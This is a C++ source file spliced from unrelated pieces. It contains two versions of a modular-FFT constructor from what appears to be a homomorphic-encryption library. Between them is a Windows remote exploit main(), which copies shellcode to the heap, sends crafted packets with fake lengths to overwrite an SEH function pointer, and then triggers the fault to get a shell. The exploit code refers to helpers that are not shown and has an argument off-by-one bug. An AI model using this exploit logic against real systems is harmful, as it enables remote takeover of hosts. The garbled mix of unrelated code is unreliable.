// Constructor: it is assumed that zms is already set with m>1
// If q == 0, then the current context is used
template <class type> Cmod<type>::
Cmod(const PAlgebra &zms, const zz &qq, const zz &rt)
{
assert(zms.getM()>1);
bool explicitModulus = true;
if (qq == 0) {
q = zp::modulus();
explicitModulus = false;
}
else
q = qq;
zMStar = &zms;
root = rt;
zz mm;
mm = zms.getM();
m_inv = InvMod(mm, q);
zz_pBak bak;
if (explicitModulus) {
bak.save(); // backup the current modulus
context = BuildContext(q, NextPowerOfTwo(zms.getM()) + 1);
context.restore(); // set NTL's current modulus to q
}
else
context.save();
if (IsZero(root)) { // Find a 2m-th root of unity modulo q, if not given
zp rtp;
long e = 2*zms.getM();
FindPrimitiveRoot(rtp,e); // NTL routine, relative to current modulus
if (IsZero(rtp)) // sanity check
Error("Cmod::compRoots(): no 2m'th roots of unity mod q");
root = rep(rtp);
}
rInv = InvMod(root,q); // set rInv = root^{-1} mod q
// Allocate memory (relative to current modulus that was defined above).
// These objects will be initialized when anyone calls FFT/iFFT.
zpx phimx_poly;
conv(phimx_poly, zms.getPhimX());
powers = new zpx();
Rb = new fftrep();
Ra = new fftrep();
ipowers = new zpx();
iRb = new fftrep();
phimx = new zpxModulus(phimx_poly);
scratch = new zpx();
}
void main(int argc, char *argv[])
{
if(argc < 5)
{
help(argv[0]);
return;
}
int itype = 0;
int b = 0;
if(argc == 5)
b = atoi(argv[5]);
char *ip = argv[1];
int port = atoi(argv[2]);
printf("(^_^) Start exploiting journey!\n");
//build context, copy shellcode to heap
BuildContext(ip, port);
BuildContext(ip, port);
BuildContext(ip, port);
BuildShell(argv[3], atoi(argv[4]));
BuildContext(ip, port);
BuildContext(ip, port);
BuildContext(ip, port);
//finish building
printf("(^_^) Context built!\n");
SOCKET s = ConnectTo(ip, port);
send(s, peer0_0, sizeof(peer0_0), 0);
char buf[5000];
WriteFakeLength(OS[itype].TopSEH-BaseImage[b]-4);
recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0);
Disconnect(s);
printf("(^_^) Function pointer wrote!\n");
//trigger
printf("(*_*) Trigger fault...");
Sleep(500);
s = ConnectTo(ip, port);
send(s, peer0_0, sizeof(peer0_0), 0);
//WriteFakeLength(0x80811102-BaseImage[b]-4);
WriteFakeLength(0x226);
recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0);
Disconnect(s);
printf("Done!\n(*_*) Any shell?");
}
// Constructor: it is assumed that zms is already set with m>1
// If q == 0, then the current context is used
Cmodulus::Cmodulus(const PAlgebra &zms, long qq, long rt)
{
assert(zms.getM()>1);
bool explicitModulus = true;
if (qq == 0) {
q = zz_p::modulus();
explicitModulus = false;
}
else
q = qq;
zMStar = &zms;
root = rt;
long mm;
mm = zms.getM();
m_inv = InvMod(mm, q);
zz_pBak bak;
if (zms.getPow2()) {
// special case when m is a power of 2
assert( explicitModulus );
bak.save();
RandomState state; SetSeed(conv<ZZ>("84547180875373941534287406458029"));
// DIRT: this ensures the roots are deterministically generated
// inside the zz_pContext constructor
context = zz_pContext(INIT_USER_FFT, q);
state.restore();
context.restore();
powers.set_ptr(new zz_pX);
ipowers.set_ptr(new zz_pX);
long k = zms.getPow2();
long phim = 1L << (k-1);
assert(k <= zz_pInfo->MaxRoot);
// rootTables get initialized 0..zz_pInfo->Maxroot
#ifdef FHE_OPENCL
altFFTInfo = MakeSmart<AltFFTPrimeInfo>();
InitAltFFTPrimeInfo(*altFFTInfo, *zz_pInfo->p_info, k-1);
#endif
long w0 = zz_pInfo->p_info->RootTable[0][k];
long w1 = zz_pInfo->p_info->RootTable[1][k];
powers->rep.SetLength(phim);
powers_aux.SetLength(phim);
for (long i = 0, w = 1; i < phim; i++) {
powers->rep[i] = w;
powers_aux[i] = PrepMulModPrecon(w, q);
w = MulMod(w, w0, q);
}
ipowers->rep.SetLength(phim);
ipowers_aux.SetLength(phim);
for (long i = 0, w = 1; i < phim; i++) {
ipowers->rep[i] = w;
ipowers_aux[i] = PrepMulModPrecon(w, q);
w = MulMod(w, w1, q);
}
return;
}
if (explicitModulus) {
bak.save(); // backup the current modulus
context = BuildContext(q, NextPowerOfTwo(zms.getM()) + 1);
context.restore(); // set NTL's current modulus to q
}
else
context.save();
if (root==0) { // Find a 2m-th root of unity modulo q, if not given
zz_p rtp;
long e = 2*zms.getM();
FindPrimitiveRoot(rtp,e); // NTL routine, relative to current modulus
if (rtp==0) // sanity check
Error("Cmod::compRoots(): no 2m'th roots of unity mod q");
root = rep(rtp);
}
rInv = InvMod(root,q); // set rInv = root^{-1} mod q
// Allocate memory (relative to current modulus that was defined above).
// These objects will be initialized when anyone calls FFT/iFFT.
zz_pX phimx_poly;
conv(phimx_poly, zms.getPhimX());
powers.set_ptr(new zz_pX);
Rb.set_ptr(new fftRep);
ipowers.set_ptr(new zz_pX);
iRb.set_ptr(new fftRep);
phimx.set_ptr(new zz_pXModulus1(zms.getM(), phimx_poly));
BluesteinInit(mm, conv<zz_p>(root), *powers, powers_aux, *Rb);
BluesteinInit(mm, conv<zz_p>(rInv), *ipowers, ipowers_aux, *iRb);
}
